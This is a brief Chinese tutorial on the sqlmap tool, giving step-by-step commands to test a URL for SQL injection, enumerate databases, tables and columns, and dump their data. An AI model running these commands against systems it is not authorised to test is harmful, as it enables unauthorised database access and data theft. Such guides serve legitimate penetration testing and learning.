SQL注入 注入工具sqlmap

使用

下载sqlmap后，通过命令行cd到sqlmap地址下，打开sqlmap.py(python版本要在2.7以内)

基本语句

1.判断某网址是否可注入：

sqlmap.py -u "要测试的地址"

2.当出现下图所示说明其发现id是可注入的，是否还需要测试其他参数是否可注入（例如url后面是id=1&user=aaa），此时如果选否，则直接进行注入判断，选是则会判断user是否可注入

3.当确认可以注入时判断数据库：

sqlmap.py -u "要测试的地址" --dbs

4.如果只有一个数据库之类时，则可能上面的语句无效，这时可以直接查表名：

sqlmap.py -u "要测试的地址" --tables

5.如果查到数据库，要查数据库下相关表名：

sqlmap.py -u "要测试的地址" -D [指定数据库名] --tables

6.获取列名：

sqlmap.py -u "要测试的地址" -D [指定数据库] -T [指定表] --columns

7.获取数据名：

sqlmap.py -u "要测试的地址" -D [指定数据库] -T [指定表] -C [指定列，如果多个用引号包起来，里面用逗号隔开] --dump

8.注：以上直接--tables、--columns、--dump不指定其他的话将会去获取所有的数据，例如直接地址后面--dump，则当前数据库内所有表名、列名、数据都会获取